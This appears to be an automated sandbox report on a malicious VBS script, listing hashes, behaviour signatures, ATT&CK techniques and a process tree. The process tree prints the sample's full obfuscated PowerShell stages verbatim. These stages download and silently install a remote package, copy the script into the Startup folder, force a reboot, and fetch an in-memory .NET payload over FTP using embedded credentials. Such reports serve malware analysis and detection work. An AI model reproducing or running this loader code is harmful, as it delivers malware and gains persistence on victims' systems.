4f0190aabf763b79ab3f5649b12cc5bf3c545b2e7047f6befca7638918123fe2

General

Target

4f0190aabf763b79ab3f5649b12cc5bf3c545b2e7047f6befca7638918123fe2.vbs
Size

689KB
MD5

0db817d8d07638cd81adee6852de57f7
SHA1

ca6589dcd6d33e3cc5f65d492b81ae376606d9dd
SHA256

4f0190aabf763b79ab3f5649b12cc5bf3c545b2e7047f6befca7638918123fe2
SHA512

e4d57643aa231040a079f35c9c8365dab6291f76a1ff6f28db373d7d664f2aae240c85a585aa1908bd744176e7e437d5bd9c0e78c22f7f48de12bacb159befc8
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE77777777777777777777777777777777777777Y:rnRC7pT0FT2w

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4f0190aabf763b79ab3f5649b12cc5bf3c545b2e7047f6befca7638918123fe2.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4f0190aabf763b79ab3f5649b12cc5bf3c545b2e7047f6befca7638918123fe2.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2052	powershell.exe
2472	powershell.exe
2620	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2052	powershell.exe
2472	powershell.exe
2892	powershell.exe
2620	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2620	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 2052	2060	WScript.exe	30
PID 2060 wrote to memory of 2052	2060	WScript.exe	30
PID 2060 wrote to memory of 2052	2060	WScript.exe	30
PID 2052 wrote to memory of 2472	2052	powershell.exe	32
PID 2052 wrote to memory of 2472	2052	powershell.exe	32
PID 2052 wrote to memory of 2472	2052	powershell.exe	32
PID 2472 wrote to memory of 2892	2472	powershell.exe	33
PID 2472 wrote to memory of 2892	2472	powershell.exe	33
PID 2472 wrote to memory of 2892	2472	powershell.exe	33
PID 2892 wrote to memory of 2448	2892	powershell.exe	34
PID 2892 wrote to memory of 2448	2892	powershell.exe	34
PID 2892 wrote to memory of 2448	2892	powershell.exe	34
PID 2472 wrote to memory of 2620	2472	powershell.exe	35
PID 2472 wrote to memory of 2620	2472	powershell.exe	35
PID 2472 wrote to memory of 2620	2472	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f0190aabf763b79ab3f5649b12cc5bf3c545b2e7047f6befca7638918123fe2.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9せㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしGUせㅚしdQByせㅚしHQせㅚしJwせㅚしgせㅚしCwせㅚしIせㅚしBlせㅚしGoせㅚしdwB6せㅚしGgせㅚしJせㅚしせㅚしgせㅚしCwせㅚしIせㅚしせㅚしnせㅚしGgせㅚしdせㅚしB0せㅚしHせㅚしせㅚしcwせㅚし6せㅚしC8せㅚしLwBwせㅚしGEせㅚしcwB0せㅚしGUせㅚしLgBlせㅚしGUせㅚしLwBkせㅚしC8せㅚしQQせㅚしxせㅚしHIせㅚしZQせㅚし5せㅚしC8せㅚしMせㅚしせㅚしnせㅚしCせㅚしせㅚしKせㅚしせㅚしgせㅚしF0せㅚしXQBbせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBvせㅚしFsせㅚしIせㅚしせㅚしsせㅚしCせㅚしせㅚしbせㅚしBsせㅚしHUせㅚしbgせㅚしkせㅚしCせㅚしせㅚしKせㅚしBlせㅚしGsせㅚしbwB2せㅚしG4せㅚしSQせㅚしuせㅚしCkせㅚしIせㅚしせㅚしnせㅚしEkせㅚしVgBGせㅚしHIせㅚしcせㅚしせㅚしnせㅚしCせㅚしせㅚしKせㅚしBkせㅚしG8せㅚしaせㅚしB0せㅚしGUせㅚしTQB0せㅚしGUせㅚしRwせㅚしuせㅚしCkせㅚしJwせㅚしxせㅚしHMせㅚしcwBhせㅚしGwせㅚしQwせㅚしuせㅚしDMせㅚしeQByせㅚしGEせㅚしcgBiせㅚしGkせㅚしTせㅚしBzせㅚしHMせㅚしYQBsせㅚしEMせㅚしJwせㅚしoせㅚしGUせㅚしcせㅚしB5せㅚしFQせㅚしdせㅚしBlせㅚしEcせㅚしLgせㅚしpせㅚしCせㅚしせㅚしeせㅚしBtせㅚしHoせㅚしWせㅚしB4せㅚしCQせㅚしIせㅚしせㅚしoせㅚしGQせㅚしYQBvせㅚしEwせㅚしLgBuせㅚしGkせㅚしYQBtせㅚしG8せㅚしRせㅚしB0せㅚしG4せㅚしZQByせㅚしHIせㅚしdQBDせㅚしDoせㅚしOgBdせㅚしG4せㅚしaQBhせㅚしG0せㅚしbwBEせㅚしHせㅚしせㅚしcせㅚしBBせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚし7せㅚしCkせㅚしIせㅚしせㅚしpせㅚしCせㅚしせㅚしJwBBせㅚしCcせㅚしIせㅚしせㅚしsせㅚしCせㅚしせㅚしJwCTIToせㅚしkyEnせㅚしCせㅚしせㅚしKせㅚしBlせㅚしGMせㅚしYQBsせㅚしHせㅚしせㅚしZQBSせㅚしC4せㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしIせㅚしせㅚしoせㅚしGcせㅚしbgBpせㅚしHIせㅚしdせㅚしBTせㅚしDQせㅚしNgBlせㅚしHMせㅚしYQBCせㅚしG0せㅚしbwByせㅚしEYせㅚしOgせㅚし6せㅚしF0せㅚしdせㅚしByせㅚしGUせㅚしdgBuせㅚしG8せㅚしQwせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしeせㅚしBtせㅚしHoせㅚしWせㅚしB4せㅚしCQせㅚしIせㅚしBdせㅚしF0せㅚしWwBlせㅚしHQせㅚしeQBCせㅚしFsせㅚしOwせㅚしnせㅚしCUせㅚしSQBoせㅚしHEせㅚしUgBYせㅚしCUせㅚしJwせㅚしgせㅚしD0せㅚしIせㅚしBlせㅚしGoせㅚしdwB6せㅚしGgせㅚしJせㅚしせㅚし7せㅚしCkせㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZwBuせㅚしGkせㅚしcgB0せㅚしFMせㅚしZせㅚしBhせㅚしG8せㅚしbせㅚしBuせㅚしHcせㅚしbwBEせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしOwせㅚし4せㅚしEYせㅚしVせㅚしBVせㅚしDoせㅚしOgBdせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしHQせㅚしeせㅚしBlせㅚしFQせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQB0せㅚしG4せㅚしZQBpせㅚしGwせㅚしQwBiせㅚしGUせㅚしVwせㅚしuせㅚしHQせㅚしZQBOせㅚしCせㅚしせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしE8せㅚしLQB3せㅚしGUせㅚしTgせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQせㅚしoせㅚしGUせㅚしcwBvせㅚしHせㅚしせㅚしcwBpせㅚしGQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしIせㅚしせㅚしnせㅚしHQせㅚしeせㅚしB0せㅚしC4せㅚしMQせㅚしwせㅚしEwせㅚしTせㅚしBEせㅚしC8せㅚしMQせㅚしwせㅚしC8せㅚしcgBlせㅚしHQせㅚしcせㅚしB5せㅚしHIせㅚしYwBwせㅚしFUせㅚしLwByせㅚしGIせㅚしLgBtせㅚしG8せㅚしYwせㅚしuせㅚしHQせㅚしYQByせㅚしGIせㅚしdgBrせㅚしGMせㅚしcwBlせㅚしGQせㅚしLgBwせㅚしHQせㅚしZgBせㅚしせㅚしDEせㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしvせㅚしC8せㅚしOgBwせㅚしHQせㅚしZgせㅚしnせㅚしCせㅚしせㅚしKせㅚしBnせㅚしG4せㅚしaQByせㅚしHQせㅚしUwBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚし7せㅚしCkせㅚしJwBせㅚしせㅚしEせㅚしせㅚしcせㅚしBKせㅚしDgせㅚしNwせㅚし1せㅚしDEせㅚしMgBvせㅚしHIせㅚしcせㅚしByせㅚしGUせㅚしcせㅚしBvせㅚしGwせㅚしZQB2せㅚしGUせㅚしZせㅚしせㅚしnせㅚしCwせㅚしJwせㅚしxせㅚしHQせㅚしYQByせㅚしGIせㅚしdgBrせㅚしGMせㅚしcwBlせㅚしGQせㅚしJwせㅚしoせㅚしGwせㅚしYQBpせㅚしHQせㅚしbgBlせㅚしGQせㅚしZQByせㅚしEMせㅚしawByせㅚしG8せㅚしdwB0せㅚしGUせㅚしTgせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしbwせㅚしtせㅚしHcせㅚしZQBuせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHMせㅚしbせㅚしBhせㅚしGkせㅚしdせㅚしBuせㅚしGUせㅚしZせㅚしBlせㅚしHIせㅚしQwせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしOせㅚしBGせㅚしFQせㅚしVQせㅚし6せㅚしDoせㅚしXQBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgB0せㅚしHgせㅚしZQBUせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしdせㅚしBuせㅚしGUせㅚしaQBsせㅚしEMせㅚしYgBlせㅚしFcせㅚしLgB0せㅚしGUせㅚしTgせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBPせㅚしC0せㅚしdwBlせㅚしE4せㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしDsせㅚしMgせㅚしxせㅚしHMせㅚしbせㅚしBUせㅚしDoせㅚしOgBdせㅚしGUせㅚしcせㅚしB5せㅚしFQせㅚしbせㅚしBvせㅚしGMせㅚしbwB0せㅚしG8せㅚしcgBQせㅚしHkせㅚしdせㅚしBpせㅚしHIせㅚしdQBjせㅚしGUせㅚしUwせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBsせㅚしG8せㅚしYwBvせㅚしHQせㅚしbwByせㅚしFせㅚしせㅚしeQB0せㅚしGkせㅚしcgB1せㅚしGMせㅚしZQBTせㅚしDoせㅚしOgBdせㅚしHIせㅚしZQBnせㅚしGEせㅚしbgBhせㅚしE0せㅚしdせㅚしBuせㅚしGkせㅚしbwBQせㅚしGUせㅚしYwBpせㅚしHYせㅚしcgBlせㅚしFMせㅚしLgB0せㅚしGUせㅚしTgせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしOwB9せㅚしGUせㅚしdQByせㅚしHQせㅚしJせㅚしB7せㅚしCせㅚしせㅚしPQせㅚしgせㅚしGsせㅚしYwBhせㅚしGIせㅚしbせㅚしBsせㅚしGEせㅚしQwBuせㅚしG8せㅚしaQB0せㅚしGEせㅚしZせㅚしBpせㅚしGwせㅚしYQBWせㅚしGUせㅚしdせㅚしBhせㅚしGMせㅚしaQBmせㅚしGkせㅚしdせㅚしByせㅚしGUせㅚしQwByせㅚしGUせㅚしdgByせㅚしGUせㅚしUwせㅚし6せㅚしDoせㅚしXQByせㅚしGUせㅚしZwBhせㅚしG4せㅚしYQBNせㅚしHQせㅚしbgBpせㅚしG8せㅚしUせㅚしBlせㅚしGMせㅚしaQB2せㅚしHIせㅚしZQBTせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしHsせㅚしIせㅚしBlせㅚしHMせㅚしbせㅚしBlせㅚしH0せㅚしIせㅚしBmせㅚしC8せㅚしIせㅚしせㅚしwせㅚしCせㅚしせㅚしdせㅚしせㅚしvせㅚしCせㅚしせㅚしcgせㅚしvせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBuせㅚしHcせㅚしbwBkせㅚしHQせㅚしdQBoせㅚしHMせㅚしIせㅚしせㅚし7せㅚしCcせㅚしMせㅚしせㅚし4せㅚしDEせㅚしIせㅚしBwせㅚしGUせㅚしZQBsせㅚしHMせㅚしJwせㅚしgせㅚしGQせㅚしbgBhせㅚしG0せㅚしbQBvせㅚしGMせㅚしLQせㅚしgせㅚしGUせㅚしeせㅚしBlせㅚしC4せㅚしbせㅚしBsせㅚしGUせㅚしaせㅚしBzせㅚしHIせㅚしZQB3せㅚしG8せㅚしcせㅚしせㅚし7せㅚしCせㅚしせㅚしZQBjせㅚしHIせㅚしbwBmせㅚしC0せㅚしIせㅚしせㅚしpせㅚしCせㅚしせㅚしJwBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしFwせㅚしcwBtせㅚしGEせㅚしcgBnせㅚしG8せㅚしcgBQせㅚしFwせㅚしdQBuせㅚしGUせㅚしTQせㅚしgせㅚしHQせㅚしcgBhせㅚしHQせㅚしUwBcせㅚしHMせㅚしdwBvせㅚしGQせㅚしbgBpせㅚしFcせㅚしXせㅚしB0せㅚしGYせㅚしbwBzせㅚしG8せㅚしcgBjせㅚしGkせㅚしTQBcせㅚしGcせㅚしbgBpせㅚしG0せㅚしYQBvせㅚしFIせㅚしXせㅚしBhせㅚしHQせㅚしYQBEせㅚしHせㅚしせㅚしcせㅚしBBせㅚしFwせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしGQせㅚしbせㅚしBvせㅚしEYせㅚしJせㅚしせㅚしgせㅚしCgせㅚしIせㅚしBuせㅚしG8せㅚしaQB0せㅚしGEせㅚしbgBpせㅚしHQせㅚしcwBlせㅚしEQせㅚしLQせㅚしgせㅚしCcせㅚしJQBJせㅚしGgせㅚしcQBSせㅚしFgせㅚしJQせㅚしnせㅚしCせㅚしせㅚしbQBlせㅚしHQせㅚしSQせㅚしtせㅚしHkせㅚしcせㅚしBvせㅚしEMせㅚしIせㅚしせㅚし7せㅚしCせㅚしせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBzせㅚしGUせㅚしcgBvせㅚしG4せㅚしLwせㅚしgせㅚしHQせㅚしZQBpせㅚしHUせㅚしcQせㅚしvせㅚしCせㅚしせㅚしZQBsせㅚしGkせㅚしZgせㅚしkせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBhせㅚしHMせㅚしdQB3せㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBsせㅚしGwせㅚしZQBoせㅚしHMせㅚしcgBlせㅚしHcせㅚしbwBwせㅚしCせㅚしせㅚしOwせㅚしpせㅚしCcせㅚしdQBzせㅚしG0せㅚしLgBuせㅚしGkせㅚしdwBwせㅚしFUせㅚしXせㅚしせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしGEせㅚしdせㅚしBzせㅚしGEせㅚしcせㅚしせㅚしkせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZQBsせㅚしGkせㅚしZgせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしGUせㅚしbQBhせㅚしE4せㅚしcgBlせㅚしHMせㅚしVQせㅚし6せㅚしDoせㅚしXQB0せㅚしG4せㅚしZQBtせㅚしG4せㅚしbwByせㅚしGkせㅚしdgBuせㅚしEUせㅚしWwせㅚしgせㅚしCsせㅚしIせㅚしせㅚしnせㅚしFwせㅚしcwByせㅚしGUせㅚしcwBVせㅚしFwせㅚしOgBDせㅚしCcせㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしGQせㅚしbせㅚしBvせㅚしEYせㅚしJせㅚしせㅚし7せㅚしCkせㅚしJwB1せㅚしHMせㅚしbQせㅚしuせㅚしG4せㅚしaQB3せㅚしHせㅚしせㅚしVQBcせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしYQB0せㅚしHMせㅚしYQBwせㅚしCQせㅚしIせㅚしせㅚしsせㅚしEIせㅚしSwBMせㅚしFIせㅚしVQせㅚしkせㅚしCgせㅚしZQBsせㅚしGkせㅚしRgBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBQせㅚしHcせㅚしagBzせㅚしGoせㅚしJせㅚしせㅚし7せㅚしDgせㅚしRgBUせㅚしFUせㅚしOgせㅚし6せㅚしF0せㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしdせㅚしB4せㅚしGUせㅚしVせㅚしせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしUせㅚしB3せㅚしGoせㅚしcwBqせㅚしCQせㅚしOwせㅚしpせㅚしHQせㅚしbgBlせㅚしGkせㅚしbせㅚしBDせㅚしGIせㅚしZQBXせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしTwせㅚしtせㅚしHcせㅚしZQBOせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしUせㅚしB3せㅚしGoせㅚしcwBqせㅚしCQせㅚしOwB9せㅚしDsせㅚしIせㅚしせㅚしpせㅚしCcせㅚしcgBnせㅚしDgせㅚしRせㅚしせㅚし3せㅚしG8せㅚしUgBzせㅚしGYせㅚしVgBjせㅚしHIせㅚしMgBuせㅚしEEせㅚしaせㅚしBmせㅚしGgせㅚしVgせㅚし2せㅚしEQせㅚしQwB4せㅚしFIせㅚしcQBuせㅚしHEせㅚしagせㅚし1せㅚしGoせㅚしcgBiせㅚしDEせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBlせㅚしGwせㅚしVせㅚしBRせㅚしFgせㅚしJせㅚしせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGUせㅚしbせㅚしBUせㅚしFEせㅚしWせㅚしせㅚしkせㅚしHsせㅚしIせㅚしBlせㅚしHMせㅚしbせㅚしBlせㅚしH0せㅚしOwせㅚしgせㅚしCkせㅚしJwB4せㅚしDQせㅚしZgBoせㅚしFoせㅚしTQB3せㅚしE4せㅚしNwBVせㅚしGUせㅚしXwせㅚしwせㅚしF8せㅚしNQBfせㅚしGkせㅚしYwBzせㅚしGIせㅚしaせㅚしせㅚし3せㅚしEMせㅚしUせㅚしせㅚしwせㅚしEkせㅚしZgBQせㅚしGQせㅚしQQせㅚしyせㅚしDEせㅚしMQせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしGUせㅚしbせㅚしBUせㅚしFEせㅚしWせㅚしせㅚしkせㅚしCgせㅚしIAA9ACAAZQBsAFQAUQBYACQAewAgACkAcgBlAFYAbgBpAFcAJAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIAByAGUAVgBuAGkAVwAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABlAGwAVABRAFgAJAA7ACkAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAYQB0AHMAYQBwACQAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABhAHQAcwBhAHAAJAB7ACAAKQByAGUAdwBvAHAAcgBlAFYAJAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAAcgBlAHcAbwBwAHIAZQBWACQAIAA7AA==';$GBekT = $qCybe.replace('せㅚし' , 'A') ;$QlmBo = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $GBekT ) ); $QlmBo = $QlmBo[-1..-$QlmBo.Length] -join '';$QlmBo = $QlmBo.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\4f0190aabf763b79ab3f5649b12cc5bf3c545b2e7047f6befca7638918123fe2.vbs');powershell $QlmBo
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Verpower = $host.Version.Major.Equals(2) ;if ($Verpower) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$XQTle = 'https://drive.google.com/uc?export=download&id=';$WinVer = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($WinVer) {$XQTle = ($XQTle + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$XQTle = ($XQTle + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$jsjwP = (New-Object Net.WebClient);$jsjwP.Encoding = [System.Text.Encoding]::UTF8;$jsjwP.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\4f0190aabf763b79ab3f5649b12cc5bf3c545b2e7047f6befca7638918123fe2.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$CSaXQ.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $CSaXQ.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$CSaXQ.dispose();$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $CSaXQ.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\4f0190aabf763b79ab3f5649b12cc5bf3c545b2e7047f6befca7638918123fe2.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '0/9er1A/d/ee.etsap//:sptth' , $hzwje , 'true' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2892
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c68ed00639a96824aa83916b8fb37249

SHA1
cfe46e259de81b356624f15b0f36463370c30379

SHA256
1be7fabdf78267c56bbdf5436bf4b0918691be6effedcd271933f254851a1473

SHA512
bb106a5ec9b5bfe75c32def4d6dadca14808907b5ddccc802c7d8b6e240d009675711635b1ec0656b86f0b40b9b6ffafb6259bdd435341d388b040746a2ce8ed

Download Submit
memory/2052-4-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

Filesize
4KB

Download
memory/2052-7-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2052-6-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2052-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2052-8-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2052-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2052-9-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2052-11-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2052-29-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

Filesize
4KB

Download
memory/2052-30-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing